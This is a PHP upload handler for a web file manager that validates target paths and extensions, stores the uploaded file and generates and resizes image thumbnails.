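<?php
/*
 * Upload endpoint of the file manager.
 *
 * Flow: gate on the session marker set by the dialog, validate the target
 * folder and thumbnail folder posted by the client against the configured
 * base paths, load any per-folder config.php between the target folder and
 * $current_path, store the uploaded file (renaming on collision), and for
 * image uploads build the thumbnails and apply the configured resizing
 * limits. Failures are reported with an HTTP status line followed by exit().
 *
 * Globals read from config/config.php (and a per-folder config.php, if any):
 * $current_path, $thumbs_base_path, $ext, $ext_img, $image_resizing,
 * $image_resizing_width, $image_resizing_height, $image_max_width,
 * $image_max_height and the relative_/fixed_image_creation* settings.
 * Helpers fix_dirname, fix_filename, create_img_gd and
 * new_thumbnails_creation come from include/utils.php.
 */
include('config/config.php');

// Session gate: only requests that came through the file manager dialog
// carry this marker. Strict comparison so a non-string value cannot match.
if (!isset($_SESSION['verify']) || $_SESSION['verify'] !== 'RESPONSIVEfilemanager') {
    die('forbiden');
}
include('include/utils.php');

$storeFolder      = isset($_POST['path']) ? (string) $_POST['path'] : '';
$storeFolderThumb = isset($_POST['path_thumb']) ? (string) $_POST['path_thumb'] : '';

// Both folders must start with their configured base path and must not
// contain a dot segment after that prefix, otherwise the request could write
// (and below, require) files outside the managed tree.
$pathPos  = strpos($storeFolder, $current_path);
$thumbPos = strpos($storeFolderThumb, $thumbs_base_path);
if ($pathPos !== 0
    || $thumbPos !== 0
    || strpos($storeFolderThumb, '../', strlen($thumbs_base_path)) !== false
    || strpos($storeFolderThumb, './', strlen($thumbs_base_path)) !== false
    || strpos($storeFolder, '../', strlen($current_path)) !== false
    || strpos($storeFolder, './', strlen($current_path)) !== false) {
    die('wrong path');
}

// Walk up from the target folder towards $current_path and load the first
// per-folder config.php found; it may override the settings used below.
// The walk is bounded so a folder that never reaches $current_path cannot
// loop forever. The require relies on the prefix check above keeping $path
// inside $current_path.
$path      = $storeFolder;
$maxCycles = 50;
for ($step = 0; $step < $maxCycles; $step++) {
    $stop = ($path === $current_path);
    if (file_exists($path . 'config.php')) {
        require_once($path . 'config.php');
        $stop = true;
    }
    if ($stop) {
        break;
    }
    $path = fix_dirname($path) . '/';
}

// A request without a successfully received 'file' part has nothing to store.
if (empty($_FILES) || !isset($_FILES['file']) || $_FILES['file']['error'] !== UPLOAD_ERR_OK) {
    header('HTTP/1.1 405 Bad Request', true, 405);
    exit();
}

$tempFile        = $_FILES['file']['tmp_name'];
$targetPath      = $storeFolder;
$targetPathThumb = $storeFolderThumb;

// The name is normalised first so the extension whitelist is applied to the
// name that is actually written to disk, not to the raw client name.
$fileName  = fix_filename($_FILES['file']['name']);
$info      = pathinfo($fileName);
$extension = isset($info['extension']) ? mb_strtolower($info['extension']) : '';
if ($extension === '' || !in_array($extension, $ext, true)) {
    header('HTTP/1.1 406 file not permitted', true, 406);
    exit();
}

// On collision append ".[n]." before the extension, n being the first free slot.
if (file_exists($targetPath . $fileName)) {
    $n = 1;
    while (file_exists($targetPath . $info['filename'] . '.[' . $n . '].' . $info['extension'])) {
        $n++;
    }
    $fileName = $info['filename'] . '.[' . $n . '].' . $info['extension'];
}
$_FILES['file']['name'] = $fileName;

$targetFile      = $targetPath . $fileName;
$targetFileThumb = $targetPathThumb . $fileName;
$isImg           = in_array($extension, $ext_img, true);

if (!move_uploaded_file($tempFile, $targetFile)) {
    // Nothing was written; report it instead of silently continuing to chmod
    // and thumbnail a file that does not exist.
    header('HTTP/1.1 500 Internal Server Error', true, 500);
    exit();
}
// Uploaded content is served, not executed: no execute bit is needed.
chmod($targetFile, 0644);

if ($isImg) {
    // Any failure to produce the thumbnails is treated as an out-of-memory
    // condition: the stored file is removed and a 406 is returned. Without
    // setting the flag to true here the error branch below is unreachable.
    $memoryError = false;
    if (!create_img_gd($targetFile, $targetFileThumb, 122, 91)) {
        $memoryError = true;
    } elseif (!new_thumbnails_creation($targetPath, $targetFile, $_FILES['file']['name'], $current_path, $relative_image_creation, $relative_path_from_current_pos, $relative_image_creation_name_to_prepend, $relative_image_creation_name_to_append, $relative_image_creation_width, $relative_image_creation_height, $fixed_image_creation, $fixed_path_from_filemanager, $fixed_image_creation_name_to_prepend, $fixed_image_creation_to_append, $fixed_image_creation_width, $fixed_image_creation_height)) {
        $memoryError = true;
    } else {
        $imginfo = getimagesize($targetFile);
        if ($imginfo === false) {
            // The file passed the extension whitelist but is not a readable
            // image; treat it like any other thumbnail failure.
            $memoryError = true;
        } else {
            $srcWidth  = $imginfo[0];
            $srcHeight = $imginfo[1];

            if ($image_resizing) {
                // A zero dimension means "derive it from the aspect ratio";
                // both zero means keep the original size.
                if ($image_resizing_width == 0) {
                    if ($image_resizing_height == 0) {
                        $image_resizing_width  = $srcWidth;
                        $image_resizing_height = $srcHeight;
                    } else {
                        $image_resizing_width = $image_resizing_height * $srcWidth / $srcHeight;
                    }
                } elseif ($image_resizing_height == 0) {
                    $image_resizing_height = $image_resizing_width * $srcHeight / $srcWidth;
                }
                $srcWidth  = $image_resizing_width;
                $srcHeight = $image_resizing_height;
                create_img_gd($targetFile, $targetFile, $image_resizing_width, $image_resizing_height);
            }

            // Max resizing limit control: shrink proportionally to fit the
            // configured maximum width and height, when either is set.
            $resize = false;
            if ($image_max_width != 0 && $srcWidth > $image_max_width) {
                $resize    = true;
                $srcHeight = $image_max_width * $srcHeight / $srcWidth;
                $srcWidth  = $image_max_width;
            }
            if ($image_max_height != 0 && $srcHeight > $image_max_height) {
                $resize    = true;
                $srcWidth  = $image_max_height * $srcWidth / $srcHeight;
                $srcHeight = $image_max_height;
            }
            if ($resize) {
                create_img_gd($targetFile, $targetFile, $srcWidth, $srcHeight);
            }
        }
    }

    if ($memoryError) {
        unlink($targetFile);
        header('HTTP/1.1 406 Not enought Memory', true, 406);
        exit();
    }
}

if (isset($_POST['submit'])) {
    // Unset fields are passed as null so http_build_query omits them, which
    // is what the original direct $_POST lookups produced (minus the notices).
    $params = array();
    foreach (array('type', 'lang', 'popup', 'field_id', 'fldr') as $field) {
        $params[$field] = isset($_POST[$field]) ? $_POST[$field] : null;
    }
    header('location: dialog.php?' . http_build_query($params));
}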
